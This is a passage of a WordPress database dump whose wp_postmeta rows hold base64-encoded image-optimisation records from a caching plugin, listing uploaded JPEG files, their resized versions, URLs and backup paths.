bWUiOjE0ODM1NDY2MjUsImlkIjozMjgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNTM3MDA4ODk2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjYyNywiaWQiOjMyODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc2h1dHRlcnN0b2NrXzUzNzAwODg5Ni01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NodXR0ZXJzdG9ja181MzcwMDg4OTYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zaHV0dGVyc3RvY2tfNTM3MDA4ODk2LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NjMyLCJpZCI6MzI4Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (28702, 3238, 'wpfc_optimisation_reduction', '6'); 
INSERT INTO `wp_postmeta` VALUES (28703, 3238, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvZWxlY3RyaWNhbC1ncmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9lbGVjdHJpY2FsLWdyZWFzZS5qcGciLCJ3aWR0aCI6NTQ4LCJoZWlnaHQiOjUwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL2VsZWN0cmljYWwtZ3JlYXNlLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjY0NSwiaWQiOiIzMjM4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9lbGVjdHJpY2FsLWdyZWFzZS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL2VsZWN0cmljYWwtZ3JlYXNlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvZWxlY3RyaWNhbC1ncmVhc2UtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY2NDcsImlkIjozMjM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL2VsZWN0cmljYWwtZ3JlYXNlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvZWxlY3RyaWNhbC1ncmVhc2UtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9lbGVjdHJpY2FsLWdyZWFzZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjY1MCwiaWQiOjMyMzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvZWxlY3RyaWNhbC1ncmVhc2UtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9lbGVjdHJpY2FsLWdyZWFzZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL2VsZWN0cmljYWwtZ3JlYXNlLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NjUyLCJpZCI6MzIzOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9lbGVjdHJpY2FsLWdyZWFzZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL2VsZWN0cmljYWwtZ3JlYXNlLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvZWxlY3RyaWNhbC1ncmVhc2UtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY2NTUsImlkIjozMjM4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL2VsZWN0cmljYWwtZ3JlYXNlLTUxMHg1MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo1MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvZWxlY3RyaWNhbC1ncmVhc2UtNTEweDUwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9lbGVjdHJpY2FsLWdyZWFzZS01MTB4NTAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjY2MiwiaWQiOjMyMzh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28704, 3204, 'wpfc_optimisation_reduction', '72188'); 
INSERT INTO `wp_postmeta` VALUES (28705, 3204, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQuanBnIiwid2lkdGgiOjEwMTIsImhlaWdodCI6MjkyLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC5qcGciLCJyZWR1Y3Rpb24iOjcyMTgxLCJ0aW1lIjoxNDgzNTQ2NjY3LCJpZCI6IjMyMDQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQtMzQweDI5Mi5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI5MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9tcy1sZXR0ZXJoZWFkLTM0MHgyOTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC0zNDB4MjkyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjY3MCwiaWQiOjMyMDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC04MDB4MjMxLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6MjMxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQtODAweDIzMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9tcy1sZXR0ZXJoZWFkLTgwMHgyMzEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2NjcyLCJpZCI6MzIwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9tcy1sZXR0ZXJoZWFkLTc2OHgyMjIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoyMjIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC03Njh4MjIyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQtNzY4eDIyMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY2NzUsImlkIjozMjA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9tcy1sZXR0ZXJoZWFkLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjY3NywiaWQiOjMyMDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9tcy1sZXR0ZXJoZWFkLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2Njc5LCJpZCI6MzIwNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9tcy1sZXR0ZXJoZWFkLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY2ODIsImlkIjozMjA0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTJcL21zLWxldHRlcmhlYWQtNTEweDI5Mi5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjI5MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9tcy1sZXR0ZXJoZWFkLTUxMHgyOTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMlwvbXMtbGV0dGVyaGVhZC01MTB4MjkyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NjY4NSwiaWQiOjMyMDR9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28706, 3191, 'wpfc_optimisation_reduction', '19281'); 
INSERT INTO `wp_postmeta` VALUES (28707, 3191, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvZ3VsbG8tc2lnbmF0dXJlLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvZ3VsbG8tc2lnbmF0dXJlLmpwZyIsIndpZHRoIjoyMTIsImhlaWdodCI6NzksIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9ndWxsby1zaWduYXR1cmUuanBnIiwicmVkdWN0aW9uIjoxOTI4MCwidGltZSI6MTQ4MzU0Njg1OSwiaWQiOiIzMTkxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEyXC9ndWxsby1zaWduYXR1cmUtMjAweDc5LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6NzksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMlwvZ3VsbG8tc2lnbmF0dXJlLTIwMHg3OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEyXC9ndWxsby1zaWduYXR1cmUtMjAweDc5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Njg2MSwiaWQiOjMxOTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28708, 3168, 'wpfc_optimisation_reduction', '738209'); 
INSERT INTO `wp_postmeta` VALUES (28709, 3168, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6OTkyLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC5qcGciLCJyZWR1Y3Rpb24iOjczODIwMiwidGltZSI6MTQ4MzU0Njg3MywiaWQiOiIzMTY4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzNDc1MzQ0LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY4NzgsImlkIjozMTY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQtODAweDc5NC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjc5NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzNDc1MzQ0LTgwMHg3OTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC04MDB4Nzk0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Njg4MSwiaWQiOjMxNjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC03Njh4NzYyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NzYyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQtNzY4eDc2Mi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzNDc1MzQ0LTc2OHg3NjIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2ODg0LCJpZCI6MzE2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzNDc1MzQ0LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDY4OTAsImlkIjozMTY4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzNDc1MzQ0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Njg5MywiaWQiOjMxNjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja181MjM0NzUzNDQtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzNDc1MzQ0LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ2ODk2LCJpZCI6MzE2OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNTIzNDc1MzQ0LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzUyMzQ3NTM0NC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250Z